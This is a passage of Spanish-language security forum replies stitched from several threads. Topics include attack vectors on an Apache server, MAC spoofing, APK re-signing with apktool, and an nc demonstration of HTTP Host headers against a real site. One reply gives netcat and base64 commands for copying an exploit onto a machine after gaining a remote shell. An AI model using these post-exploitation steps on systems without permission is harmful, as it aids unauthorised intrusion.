Hola,

Soy ingeniero de telecomunicaciones, y me estoy metiendo en el mundillo de la seguridad y el cracking web. El caso es que estoy intentando crackear
una web en la que el unico puerto abierto es el "443/tcp open  ssl/ssl Apache httpd (SSL-only mode)" y estoy un poco perdido. Es posible hackearlo?

Hola, soy repartidor de butano. Por la información que das es un servidor apache por lo que será un servidor web. Los fallos que puedes explotar con esa premisa (si es que los tiene) son fallos del sistema operativo a nivel de driver, si tiene puesto un firewall fallos del firewall, fallos del servidor apache, y fallos en los sistemas web programados probablemente en php, ya que se trata de un apache. Si el apache utiliza un sistema de almacenamiento de bases de datos tambien puedes intentar ataques a la base de datos.
A partir de ahi a aprender. Que tengas esos vectores de posible ataque no quiere decir que sea vulnerable si no que si hay algo mal configurado o programado y los fallos lo permiten podrás hacer algo. Bueno y si tienes
acceso físico al servidor tambien tienes ese vector de ataque.

Contestar a si es posible hackearlo pues dependerá. La información que das es tan genérica como decir, hay una caja fuerte y tiene una puerta ¿Es posible entrar en ella? bueno pues depende...

modo paternalista on...

Por otro lado, mas te vale que el sistema al que quieres entrar sea tuyo o te hayan dado permiso. Si no, despues vienen los lloros. Por norma aqui cuando se hacen esas preguntas se da por supuesto que
el sistema es tuyo o tienes permisos tenlo en cuenta, porque las técnicas que te podrán decir puede que ayuden a verificar la seguridad, serán tecnicas de pentesting que no van en la dieccion de hacer cosas ilegales.
Por analogía, te pueden decir que tires un ladrillo a la ventana de una tienda para llevarte algo de dentro, pero evidentemente si no tienes permiso del dueño de la tienda o la tienda no es tuya no es muy
buena idea aunque sea una forma sencilla de llevarte lo que deseas de la tienda.

modo paternalista off...

¿Sabes algo de servidores, de Linux (porque no se sabe que SO es el servidor, teniendo un apache por estadística probablemente sea un linux) y de programación de servidores?
¿Que hay en el puerto?¿Hay una aplicacion web?¿En que está programado? ¿Tiene sistema de login? ¿Cual es el sistema operativo del servidor físico? ¿Cuales son las versiones de los servidores, apache en este caso?
A partir de contestar a estas preguntas igual se te puede orientar.

un saludo.

Deja el link de la iso de vulhub y si tiene tiempo alguien igual se la mira y te puede ayudar.

en el momento de ejecutar me indica Invalid argument. ¿Alguna idea?

¿Has probado a compilar el exploit de forma estática?

Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

Para copiar un archivo de remoto a local tienes muchas opciones, desde un wget como te comentan, un scp si tiene instalado, utilizando netcat y una redireccion (ejecutas en tu equipo: nc -l -p PUERTO < archivo.exe y en el otro: nc TUIP PUERTO > archivo.exe). Puedes tambien abrir una consola ejecutar "cat archivo.exe | base64" y copiar y pegar de la consola para luego en la máquina remota donde tienes  que poner "echo 'TEXTOCOPIADO' | base64 -d". Hay más opciones, pero estas son unas cuantas.

Y al parecer permitía RCE y esas cosas. Bug o feature para la NSA

https://threatpost.com/nsa-ghidra-bug-rce/142937/

Es el constructor de la clase y es la que permite que cuando se construye un objeto nuedo de la clase Hora este tenga un espacio en memoria y probablemente defina valores para los atributos hora, minuto y segundo. Pero eso dependerá de su implementación interna.
Cuando haces un new, en realidad estas llamando al constructor de la clase.

Entiendo que te refieres a la MAC. En general nadie mira la MAC en un router y no se suelen almacenar, pero siempre puede cambiar la MAC (con ifconfig en linux o con las propiedades del dispositivo en el panel de control de windows). Eso sí, tienes un monton de formas más de que te identifiquen en base a el uso de la red a nivel de aplicación. Creo que la principal forma de identificación se basa más en las capas de arriba (aplicación) que en las de abajo (enlace).

En resumen, no te sirve de nada preocuparte por cambiar la MAC si después visitas tu correo o tu perfil de facebook. ^^

Igual puedes, desempaquetarlo y volverlo a empaquetar con otra firma y nombre con lo que el sistema android no detecte que es un programa que necesite de actualización.
apktool te permite hacer ese tipo de cosas. apktool -d y -b para desempaquetar y volver a empaquetar. Cambias el nombre en el manifest al empaquetar lo firmaras con tu firma privada y ya. Puede que eso funcione.

Su IP ya la sabes. Es la que resuelve el nombre de dominio. Me temo que en algo me he explicado mal pero no llego a ver en que.

Tu cuando accedes a cualquier página no accedes usando el nombre nunca, solo la IP. De hecho el navegador internamente esta enviando una peticion a la IP y no al nombre de dominio. Bueno en realidad primero resuelve la IP en el servidor DNS y despues contacta con la IP.

El problema reside en que el navegador va a poner como Host (cabecera http no confundir con cabecera IP) el servidor al que estamos intentando contactar. Esto es fácilmente emulable con nc (creo que se verá mejor ya que ahi hay que meter toda la cabecera a mano). Si por ejemplo usamos nc para contactar de esta forma (tenemos que escribir en consola lo que se ve aquí):

[email protected]:~/nc 31.220.2.74 80
GET /Paginas/VariationRoot.aspx HTTP/1.0
Host: 31.220.2.74


El servidor devuelve una página de error (tiene virtual hosts y ese nombre de host no lo tiene relacionado con ningun recurso a mostrar):

HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Thu, 14 Mar 2019 15:24:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8554
Connection: close
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.7015
X-MS-InvokeApp: 1; RequireReadOnly

<html>
    <head>
        <title>No se encontró la aplicación web en http://31.220.2.74. Compruebe que escribió la dirección URL correctamente. Si la dirección URL da servicio al contenido existente, puede que el administrador del sistema necesite agregar una nueva asignación de solicitud de dirección URL a la aplicación deseada.</title>
        <style>
....

En cambio si hacemos lo mismo especificando el Host en la cabecera (fijate que es la misma IP y mismo puerto, estamos cambiando lo que enviamos en la cabecera http, en concreto la variable Host):

[email protected]:~/nc 31.220.2.74 80
GET /Paginas/VariationRoot.aspx HTTP/1.0
Host: www.sgae.es


Lo que nos devuelve es una contestacion http válida:

HTTP/1.1 302 Found
Server: nginx
Date: Thu, 14 Mar 2019 15:29:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 141
Connection: close
Cache-Control: private
Location: http://www.sgae.es/es-ES
SPRequestGuid: 4ed91092-3f73-47d6-8197-fac78b475c17
X-SharePointHealthScore: 0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.7015
X-MS-InvokeApp: 1; RequireReadOnly

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.sgae.es/es-ES">here</a>.</h2>
</body></html>

Podriamos tener muchos nombres de domino vinculados a nuestra IP (de hecho sería irrelevante tener o no el nombre de dominio si la peticion web se construye de forma correcta), la misma IP en todos los dominios. Pero damos un recurso u otro (osea una pagina web u otra) dependiendo el nombre que nos pongan a nivel de aplicacion, a nivel http. Osea el valor que tiene la variable Host que esta en nivel de aplicacion, osea encima del nivel de transporte (TCP) y encima del nivel de red (IP).

¿Se entiende ahora?